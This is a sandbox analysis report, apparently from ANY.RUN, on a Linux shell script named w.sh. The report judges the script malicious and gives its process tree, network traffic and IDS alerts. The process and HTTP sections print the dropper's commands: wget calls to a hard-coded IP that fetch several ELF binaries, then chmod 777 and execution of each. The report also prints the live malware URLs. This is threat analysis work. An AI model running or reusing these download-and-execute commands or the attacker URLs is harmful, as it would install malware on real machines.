File name:

w.sh

Full analysis: https://app.any.run/tasks/0ef54a77-2984-4734-bf08-c2ab9a4b36ee
Verdict: Malicious activity
Analysis date: January 10, 2025, 18:54:41
OS: Ubuntu 22.04.2 LTS
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

1186B4365502DE4AD7CD4959D26E7756

SHA1:

314B5A2E9FDDC9027CD94B051B23FEF98292A996

SHA256:

D5D5B1A7C968C0ADD6558BF3E41B9CDDDAFFF1CB83B1BDD38FC53BCE507A340D

SSDEEP:

12:HtJTACxfoQ2WRpamgQebjsx91eUa74M1UtvjhB1AX/5sJ:HXxJoQD7amgQcueUa7z3+J

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Modifies file or directory owner

      • sudo (PID: 38757)
    • Connects to the server without a host name

      • wget (PID: 38808)
      • wget (PID: 38780)
      • wget (PID: 38785)
      • wget (PID: 38802)
      • wget (PID: 38775)
      • wget (PID: 38791)
      • wget (PID: 38765)
      • wget (PID: 38771)
      • wget (PID: 38828)
      • wget (PID: 38824)
      • wget (PID: 38814)
      • wget (PID: 38821)
      • wget (PID: 38818)
    • Potential Corporate Privacy Violation

      • wget (PID: 38785)
      • wget (PID: 38780)
      • wget (PID: 38802)
      • wget (PID: 38791)
      • wget (PID: 38808)
      • wget (PID: 38765)
      • wget (PID: 38775)
      • wget (PID: 38771)
      • wget (PID: 38814)
      • wget (PID: 38828)
      • wget (PID: 38821)
      • wget (PID: 38818)
      • wget (PID: 38824)
    • Executes commands using command-line interpreter

      • sudo (PID: 38760)
    • Uses wget to download content

      • bash (PID: 38763)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
260
Monitored processes
52
Malicious processes
12
Suspicious processes
4

Behavior graph

Click at the process to see the details
start dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget dash no specs chmod no specs wev86 no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget chmod no specs bash no specs wget tracker-extract-3 no specs systemctl no specs chmod no specs bash no specs wget systemctl no specs systemctl no specs chmod no specs bash no specs wget systemctl no specs chmod no specs fqkjei686 no specs wget chmod no specs bash no specs wget chmod no specs qbfwdbg no specs wget chmod no specs jefne64 no specs wget chmod no specs bash no specs wget chmod no specs bash no specs

Process information

PID
CMD
Path
Indicators
Parent process
38756/bin/sh -c "sudo chown user /home/user/Desktop/w\.sh && chmod +x /home/user/Desktop/w\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/w\.sh "/usr/bin/dashany-guest-agent
User:
user
Integrity Level:
UNKNOWN
Exit code:
32256
38757sudo chown user /home/user/Desktop/w.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38758chown user /home/user/Desktop/w.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38759chmod +x /home/user/Desktop/w.sh/usr/bin/chmoddash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38760sudo -iu user /home/user/Desktop/w.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
32256
38763-bash --login -c \/home\/user\/Desktop\/w\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
32256
38764/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38765wget http://141.98.10.40/wev86/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
38768/bin/sh -e /etc/NetworkManager/dispatcher.d/01-ifupdown connectivity-change/usr/bin/dashnm-dispatcher
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
38769chmod 777 wev86/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Executable files
0
Suspicious files
5
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
38765wget/home/user/wev86binary
MD5:
SHA256:
38775wget/home/user/ngwa5binary
MD5:
SHA256:
38785wget/home/user/ivwebcda7binary
MD5:
SHA256:
38824wget/home/user/wlw68kbinary
MD5:
SHA256:
38828wget/home/user/wrjkngh4binary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
34
TCP/UDP connections
24
DNS requests
13
Threats
14

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
91.189.91.97:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
185.125.190.49:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
185.125.190.48:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
488
NetworkManager
GET
204
91.189.91.49:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
38765
wget
GET
200
141.98.10.40:80
http://141.98.10.40/wev86
unknown
38780
wget
GET
200
141.98.10.40:80
http://141.98.10.40/woega6
unknown
38771
wget
GET
200
141.98.10.40:80
http://141.98.10.40/vevhea4
unknown
38775
wget
GET
200
141.98.10.40:80
http://141.98.10.40/ngwa5
unknown
38785
wget
GET
200
141.98.10.40:80
http://141.98.10.40/ivwebcda7
unknown
38791
wget
GET
200
141.98.10.40:80
http://141.98.10.40/debvps
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
185.125.190.48:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
484
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.49:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
91.189.91.97:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
37.19.194.80:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
38765
wget
141.98.10.40:80
UAB Host Baltic
LT
unknown
488
NetworkManager
91.189.91.49:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
38771
wget
141.98.10.40:80
UAB Host Baltic
LT
unknown
512
snapd
185.125.188.58:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
38775
wget
141.98.10.40:80
UAB Host Baltic
LT
unknown

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::96
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::2b
  • 2620:2d:4002:1::198
  • 2001:67c:1562::23
  • 2620:2d:4002:1::196
  • 2001:67c:1562::24
  • 2620:2d:4000:1::97
  • 91.189.91.97
  • 185.125.190.48
  • 91.189.91.49
  • 91.189.91.96
  • 185.125.190.18
  • 185.125.190.97
  • 91.189.91.48
  • 185.125.190.17
  • 185.125.190.49
  • 91.189.91.98
  • 185.125.190.98
  • 185.125.190.96
whitelisted
odrs.gnome.org
  • 37.19.194.80
  • 212.102.56.178
  • 207.211.211.26
  • 169.150.255.180
  • 195.181.170.19
  • 195.181.175.41
  • 169.150.255.184
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::21
whitelisted
google.com
  • 142.250.184.238
  • 2a00:1450:4001:831::200e
whitelisted
api.snapcraft.io
  • 185.125.188.58
  • 185.125.188.55
  • 185.125.188.54
  • 185.125.188.59
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::6d
  • 2620:2d:4000:1010::2e6
whitelisted
39.100.168.192.in-addr.arpa
unknown

Threats

PID
Process
Class
Message
Misc Attack
ET DROP Spamhaus DROP Listed Traffic Inbound group 22
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
Potential Corporate Privacy Violation
ET POLICY Executable and linking format (ELF) file download Over HTTP
No debug info